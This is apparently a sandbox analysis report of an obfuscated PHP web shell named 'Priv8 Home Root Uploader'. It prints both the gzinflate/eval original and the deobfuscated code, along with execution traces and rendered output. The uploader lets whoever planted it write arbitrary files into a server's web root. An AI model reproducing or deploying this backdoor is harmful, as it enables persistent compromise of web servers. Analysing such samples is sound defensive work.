Screenshot
Attributes
Environment
php_uname (Deobfuscated, Traces)

Execution
eval (Original, Traces)

Files
copy (Deobfuscated, Traces)

Input
_FILES (Deobfuscated, Traces)
_POST (Deobfuscated, Traces)

Deobfuscated PHP code
<?php

eval /* PHPDeobfuscator eval output */ {
    echo "Priv8 Home Root Uploader by LCR999X - Security Cyber Art<br>";
    echo "<b>" . php_uname() . "</b><br>";
    echo "<form method='post' enctype='multipart/form-data'>\n\t  <input type='file' name='idx_file'>\n\t  <input type='submit' name='upload' value='upload'>\n\t  </form>";
    $root = $_SERVER['DOCUMENT_ROOT'];
    $files = $_FILES['idx_file']['name'];
    $dest = $root . '/' . $files;
    if (isset($_POST['upload'])) {
        if (is_writable($root)) {
            if (@copy($_FILES['idx_file']['tmp_name'], $dest)) {
                $web = "http://" . $_SERVER['HTTP_HOST'] . "/";
                echo "uploadnya sukses beb :* -> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
            } else {
                echo "gagal upload root >:(";
            }
        } else {
            if (@copy($_FILES['idx_file']['tmp_name'], $files)) {
                echo "uploadnya sukses beb :* <b>{$files}</b> di folder ini";
            } else {
                echo "gagal upload >:(";
            }
        }
    }
};
Execution traces
data/traces/d2bf2de510fdbef4804df5bb973bc9e1_trace-1676252197.141.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:37:03.038882]
1	0	1	0.000196	393512
1	3	0	0.000263	395472	{main}	1		/var/www/html/uploads/up.PhTmL	0	0
2	4	0	0.000280	395472	gzinflate	0		/var/www/html/uploads/up.PhTmL	1	1	'��݊�0\020���\030L@Ni��&kk[Ҕ\024�Mp��\020��b9\021k[–wה}��gCRZJ{)�9��(��\'��I��i��;X��A*��{Y\tR�\026�\000w�t6�}�)l١o�\032`1P]�Ъ��ؿy\035\022S�zf�7�f�$���_�R�5�L�D� ):��5\a5H����\024��U���\005Q\004ao\004\020�F�\n\034U�!0\n\t��sn߿c]Ok��`o� x$Uy�.�f,�[\023=�q�]�ߖ�\016}\\/�,�fy�^gh�\021��Y����vw���!�e��uv�\031\030�\b�����e����`�o��lwv��L�7��I�Њ\005��UL�A�!����e��߂U�\032��\030�N��Rr\036E~x\t�ʲM��.�>�#�_��J�T3\020�N�z�\rL1�\004N-+\023d\006G.\026\002E�#S\t�iE�\a�o��\036_!q�c�\031"���\v��cΣ\023=�#��I��\004�\a����X��>o��Ѵ�S���P�����{m�{�n�O'
2	4	1	0.000351	396400
2	4	R			'<?php\necho "Priv8 Home Root Uploader by LCR999X - Security Cyber Art<br>";\necho "<b>".php_uname()."</b><br>";\necho "<form method=\'post\' enctype=\'multipart/form-data\'>\n\t  <input type=\'file\' name=\'idx_file\'>\n\t  <input type=\'submit\' name=\'upload\' value=\'upload\'>\n\t  </form>";\n$root = $_SERVER[\'DOCUMENT_ROOT\'];\n$files = $_FILES[\'idx_file\'][\'name\'];\n$dest = $root.\'/\'.$files;\nif(isset($_POST[\'upload\'])) {\n\tif(is_writable($root)) {\n\t\tif(@copy($_FILES[\'idx_file\'][\'tmp_nam'
2	5	0	0.000432	402704	eval	1	'?><?php\necho "Priv8 Home Root Uploader by LCR999X - Security Cyber Art<br>";\necho "<b>".php_uname()."</b><br>";\necho "<form method=\'post\' enctype=\'multipart/form-data\'>\n\t  <input type=\'file\' name=\'idx_file\'>\n\t  <input type=\'submit\' name=\'upload\' value=\'upload\'>\n\t  </form>";\n$root = $_SERVER[\'DOCUMENT_ROOT\'];\n$files = $_FILES[\'idx_file\'][\'name\'];\n$dest = $root.\'/\'.$files;\nif(isset($_POST[\'upload\'])) {\n\tif(is_writable($root)) {\n\t\tif(@copy($_FILES[\'idx_file\'][\'tmp_name\'], $dest)) {\n\t\t\t$web = "http://".$_SERVER[\'HTTP_HOST\']."/";\n\t\t\techo "uploadnya sukses beb :* -> <a href=\'$web/$files\' target=\'_blank\'><b><u>$web/$files</u></b></a>";\n\t\t} else {\n\t\t\techo "gagal upload root >:(";\n\t\t}\n\t} else {\n\t\tif(@copy($_FILES[\'idx_file\'][\'tmp_name\'], $files)) {\n\t\t\techo "uploadnya sukses beb :* <b>$files</b> di folder ini";\n\t\t} else {\n\t\t\techo "gagal upload >:(";\n\t\t}\n\t}\n}\n?>'	/var/www/html/uploads/up.PhTmL	1	0
3	6	0	0.000475	402704	php_uname	0		/var/www/html/uploads/up.PhTmL(1) : eval()'d code	3	0
3	6	1	0.000491	402816
3	6	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2		A						/var/www/html/uploads/up.PhTmL(1) : eval()'d code	8	$root = '/var/www/html'
2		A						/var/www/html/uploads/up.PhTmL(1) : eval()'d code	9	$files = NULL
2		A						/var/www/html/uploads/up.PhTmL(1) : eval()'d code	10	$dest = '/var/www/html/'
2	5	1	0.000569	402744
1	3	1	0.000578	397096
			0.000605	315256
TRACE END   [2023-02-12 23:37:03.039324]

Generated HTML code
<html><head></head><body>Priv8 Home Root Uploader by LCR999X - Security Cyber Art<br><b>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</b><br><form method="post" enctype="multipart/form-data">
	  <input type="file" name="idx_file">
	  <input type="submit" name="upload" value="upload">
	  </form></body></html>
Original PHP code
<?php eval("?>".gzinflate("\x95\x92\xdd\x8a\xdb\x30\x10\x85\xaf\xe3\xa7\x18\x4c\x40\x4e\x69\xec\xdb\x26\x6b\x6b\x5b\xd2\x94\x14\xb6\x4d\x70\xbc\xa5\x10\x82\x91\x62\x39\x11\x6b\x5b\xc2\x96\x77\xd7\x94\x7d\xf7\xea\x67\x43\x52\x5a\x4a\x7b\x29\xe6\x9b\x39\xe7\xcc\x28\xbe\x95\x27\xe9\xb1\xc3\x49\x80\xbf\x69\xf9\xe3\x3b\x58\x89\x9a\x41\x2a\x84\x82\x7b\x59\x09\x52\xb0\x16\xe8\x00\x77\x8b\x74\x36\x9b\x7d\x87\x29\x6c\xd9\xa1\x6f\xb9\x1a\x60\x31\x50\x5d\xfb\xd0\xaa\x98\xb6\xd8\xbf\x79\x1d\x12\x53\xec\x87\x7a\x66\xde\x37\xa4\x66\xc1\x24\xf4\xe3\x88\xe2\x5f\x91\x52\xb4\x35\xd4\x4c\x9d\x44\x91\x20\x29\x3a\x85\x80\x35\x07\x35\x48\x96\xa0\xba\xaf\x14\x97\xa4\x55\x91\xa1\xa6\x05\x51\x04\x61\x6f\x04\x10\xf3\x46\xf6\x0a\x1c\x55\xf2\x8a\x21\x30\x0a\x09\xe2\xc5\x73\x6e\xdf\xbf\x63\x5d\x4f\x6b\xae\xce\x60\x6f\xf3\x20\x78\x24\x55\x7f\x79\xba\x2e\xab\x66\x2c\x8e\x5b\x13\x3d\x81\x71\xbe\x5d\xa6\xdf\x96\xe9\x0e\x7d\x5c\x2f\xee\xbf\x2c\xbf\x66\x79\xba\x5e\x67\x68\xaf\x11\xa3\xd6\x59\xe6\xd3\xe7\xbb\xe5\x76\x77\xb1\xb0\xdf\x21\xa3\x65\xa9\x82\x75\x76\x90\x19\x18\xa2\x08\x85\xae\xef\xc6\xe3\x65\xc0\xbb\x8e\xa9\x60\x9c\x6f\xd6\xdb\x6c\x77\x76\xb2\x9f\x4c\xe0\x87\x37\xb2\xe5\xfc\x49\xef\x98\xd0\x8a\x05\xb6\xdf\x55\x4c\xe9\xfd\x41\xc8\x21\xf8\xa3\xb2\xaa\x65\xee\xd4\xdf\x82\x55\x7f\xed\x1a\x8d\x9f\x18\xd5\x4e\xfc\x93\x52\x72\x1e\x45\x7e\x78\x09\xb7\xca\xb2\x4d\xbe\xd2\x2e\xd0\x3e\xf4\x23\x9d\x5f\xe3\xee\x4a\xce\x54\x33\x10\xe8\xfa\x87\x4e\xe7\xa5\x7a\xc8\xfc\x0d\x4c\x31\xc4\x04\x4e\x2d\x2b\x13\x64\x06\x47\x2e\x16\x02\x45\xda\x23\x53\x09\xca\x69\x45\x9a\x07\xa4\x6f\x8e\xe3\x1e\x5f\x21\x71\xd4\x63\xfb\x19\x22\x82\xad\xd2\x0b\xb0\xaa\x63\xce\xa3\x13\x3d\x92\x23\xa9\xc0\x49\x83\xbd\x04\x9e\x07\x8e\xf5\xae\xf1\xff\x58\x84\x95\x3e\x6f\xe2\xef\xd1\xb4\xe3\xb3\x53\x8a\xa1\xe0\x50\x8a\xca\xfc\x7f\xde\xf0\x7f\xf1\x7b\x6d\xd5\x7b\xf1\x6e\xf1\x4f"));